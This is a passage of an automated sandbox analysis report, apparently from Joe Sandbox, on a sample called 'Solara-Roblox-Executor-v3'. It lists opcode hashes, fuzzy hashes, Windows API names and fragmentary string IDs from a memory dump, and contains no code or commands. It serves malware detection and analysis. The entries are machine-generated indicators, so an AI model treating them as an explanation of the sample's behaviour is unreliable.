                                                                                          • Opcode ID: 9a5a0498a2ca717862ac1edb51e0a3e01d30a16187560080d7b2d8d0b4e7f4c8
                                                                                          • Instruction ID: c9b40b6696d0b5d8763caf57dace5f7f4264a8846c4449b249e5ba5a2ddbd6d7
                                                                                          • Opcode Fuzzy Hash: 9a5a0498a2ca717862ac1edb51e0a3e01d30a16187560080d7b2d8d0b4e7f4c8
                                                                                          • Instruction Fuzzy Hash: B6112134A183018BE3289F18D884B7BB3A29782304F18953DE482A32A5DA389845875A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d393c868fd884853acbd059e73d317f9746b4a4db931b2f0e4a7942529d2fc91
                                                                                          • Instruction ID: 1da8381dc618a4ca9e187296dba6fe87a3d57480a9db781e0152572e60b0f2e6
                                                                                          • Opcode Fuzzy Hash: d393c868fd884853acbd059e73d317f9746b4a4db931b2f0e4a7942529d2fc91
                                                                                          • Instruction Fuzzy Hash: 0AF02B7A7541160BE318DE56DDE4937F3A6E7CA315B09103EDA42A33C1CD70F806C2A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d820f2525bf6738c434d1d264c0eef3ea5f0325e212c5b7954f03666a1fbfa8
                                                                                          • Instruction ID: 3a9f141e8853988b7f3f2cb970a468bb38eb4a159b4113e07dfb1bddb429e840
                                                                                          • Opcode Fuzzy Hash: 7d820f2525bf6738c434d1d264c0eef3ea5f0325e212c5b7954f03666a1fbfa8
                                                                                          • Instruction Fuzzy Hash: 0BE02B2BA1869047CB198F349D10372BFA75793284F29945EC8C857343C97AC10D830D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID: $$&$'$0$2$3$4$6$8$:$<$>$A$M$`$b$d$f$h$j$l$n$x$z
                                                                                          • API String ID: 3341692771-2798740646
                                                                                          • Opcode ID: e4424fe02cabf2eef7868ef0d4fe750f5292a7dbf2f3587da169bafcce8048c1
                                                                                          • Instruction ID: bdefc1d523b1e1e4b876f841dfe97036a6c04c9792d8bba4e8d9b479cf49ee7e
                                                                                          • Opcode Fuzzy Hash: e4424fe02cabf2eef7868ef0d4fe750f5292a7dbf2f3587da169bafcce8048c1
                                                                                          • Instruction Fuzzy Hash: 6E61E2501087C1C9DB66CF3C88D87463E915B67228F4D83D9D9E54F2EBC2AAC15AC37A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID: $$&$'$0$2$3$4$6$8$:$<$>$A$M$`$b$d$f$h$j$l$n$x$z
                                                                                          • API String ID: 3341692771-2798740646
                                                                                          • Opcode ID: 23c87b1005df28f046aa6d11634136e20f3720700c2db750913fe18d8626ca0d
                                                                                          • Instruction ID: f20ee076b3de27c2360345ad14065d5581df04eaa58cf06636bdff4231e55c6b
                                                                                          • Opcode Fuzzy Hash: 23c87b1005df28f046aa6d11634136e20f3720700c2db750913fe18d8626ca0d
                                                                                          • Instruction Fuzzy Hash: 3C51C2501087C1C9DB66CF3C88D87463E911B67228F4D83C9D9E54F2EBD2AAC15AC37A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: $"$$$&$,$.$/$P$R$X$Z$\$^
                                                                                          • API String ID: 1927566239-1507953242
                                                                                          • Opcode ID: 2a30aace7e4f930d3a8f08f4125093141b279f979fbb3f317766bee768b74d85
                                                                                          • Instruction ID: 3401b22b5b9fc65170e7816df40051b5045129c6ff91689df790f6e397e48a22
                                                                                          • Opcode Fuzzy Hash: 2a30aace7e4f930d3a8f08f4125093141b279f979fbb3f317766bee768b74d85
                                                                                          • Instruction Fuzzy Hash: A9412A7010C7C18AD365DB38C59834BBFD19B96228F085A9CE4E91B3D6C7B98105C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: $"$$$&$,$.$/$P$R$X$Z$\$^
                                                                                          • API String ID: 1927566239-1507953242
                                                                                          • Opcode ID: 9c4e9196b5b55551b594d6d6eaeb3c55c10473850b04ab1867b9fac711fdfe38
                                                                                          • Instruction ID: 4e355202c2fbc180d5219c122ceef1732365bf9cbae1d26078e11fff2d123c82
                                                                                          • Opcode Fuzzy Hash: 9c4e9196b5b55551b594d6d6eaeb3c55c10473850b04ab1867b9fac711fdfe38
                                                                                          • Instruction Fuzzy Hash: 01413A7400C7C18ED366DB28C49874BBFE16B96228F489B9CE0E54B2D6C7B98509CB57
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: `$b$d$f$x$z${$|$~
                                                                                          • API String ID: 1927566239-877673820
                                                                                          • Opcode ID: dc1adf4479a58d8797e3600710b90eb8f1546a8639fe43e8684fa11a3095980d
                                                                                          • Instruction ID: 73642d0edf263419d20e1e21b8d240117004e5cb187e3124c968d2f61467aee4
                                                                                          • Opcode Fuzzy Hash: dc1adf4479a58d8797e3600710b90eb8f1546a8639fe43e8684fa11a3095980d
                                                                                          • Instruction Fuzzy Hash: C8314630209B818ED711CF3CC594702BFE1AF5A324F08C69CD5A94F3EAC279A005CB66
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: `$b$d$f$x$z${$|$~
                                                                                          • API String ID: 1927566239-877673820
                                                                                          • Opcode ID: 798dc54348ca299f373dbb31f95c63647fb7b80f40b3ea1070f0d53bb4d645ee
                                                                                          • Instruction ID: f87653851ce7f7fb69c0aa61d833cd83870d97243b134dde3a0020ed5cd17d71
                                                                                          • Opcode Fuzzy Hash: 798dc54348ca299f373dbb31f95c63647fb7b80f40b3ea1070f0d53bb4d645ee
                                                                                          • Instruction Fuzzy Hash: A2311630208B818ED711CF7CC484716BFE1AB5A324F08C69DD4E98F3EAC679A405CB66
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: 0$f$q$}
                                                                                          • API String ID: 2525500382-444557768
                                                                                          • Opcode ID: 1e7447d7197a742be0a0a142cf4f0ec851b1e73fea7ea62d2db8e03098ee4be4
                                                                                          • Instruction ID: 27a5e2d91190e76d882bfb83d9b17f20158c9ceb8bbe4268355428f1bf3c7715
                                                                                          • Opcode Fuzzy Hash: 1e7447d7197a742be0a0a142cf4f0ec851b1e73fea7ea62d2db8e03098ee4be4
                                                                                          • Instruction Fuzzy Hash: 52818F2010DBC28ED3328B3C8848B8BBED15BA7234F184B9DE1F95B2E6D7644546C767
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 004237BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: +Ku$rs$s_,Y
                                                                                          • API String ID: 237503144-3023911729
                                                                                          • Opcode ID: 132a4129497f545aff3889e5f01bf61e83d8f95caceac5cccf99d046e2a7fa37
                                                                                          • Instruction ID: b2387704808af85701359b9831b06c535449624ba98026c49304e44a79d6b797
                                                                                          • Opcode Fuzzy Hash: 132a4129497f545aff3889e5f01bf61e83d8f95caceac5cccf99d046e2a7fa37
                                                                                          • Instruction Fuzzy Hash: 1A3136726083254FC314CE64DC8278BBBE0EB81708F05892CE4D9DB385D7B8D9068BC6
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: &$1
                                                                                          • API String ID: 2610073882-1672938204
                                                                                          • Opcode ID: 055ad1bcf911e6b22abc2e7994d6cb6182d07d9b6d15b136c6b3d11df41792ab
                                                                                          • Instruction ID: 97c73bdc7c0cbf9f901ddca20a57c4532b9f677b322e8ab6f4c4f59f015b5d73
                                                                                          • Opcode Fuzzy Hash: 055ad1bcf911e6b22abc2e7994d6cb6182d07d9b6d15b136c6b3d11df41792ab
                                                                                          • Instruction Fuzzy Hash: 4141047110C7C28AC326DB7C848869EFFD16BA6324F084A9CE4E58B3E2D7B59445C767
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004290E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: "#`$"#`
                                                                                          • API String ID: 237503144-2918922839
                                                                                          • Opcode ID: 4bedf46d67d3f14070650c097a6e773abcf144a338bde8666c293731b7166661
                                                                                          • Instruction ID: 422267ae647eaa6997567527cdb8426c66d61bb1c8d3a678754d8760bac322e0
                                                                                          • Opcode Fuzzy Hash: 4bedf46d67d3f14070650c097a6e773abcf144a338bde8666c293731b7166661
                                                                                          • Instruction Fuzzy Hash: 92F0F6313883615FE715CF50ACA2F5FB7A2FBC2704F02843DE9419B1C6C6A4A00AC796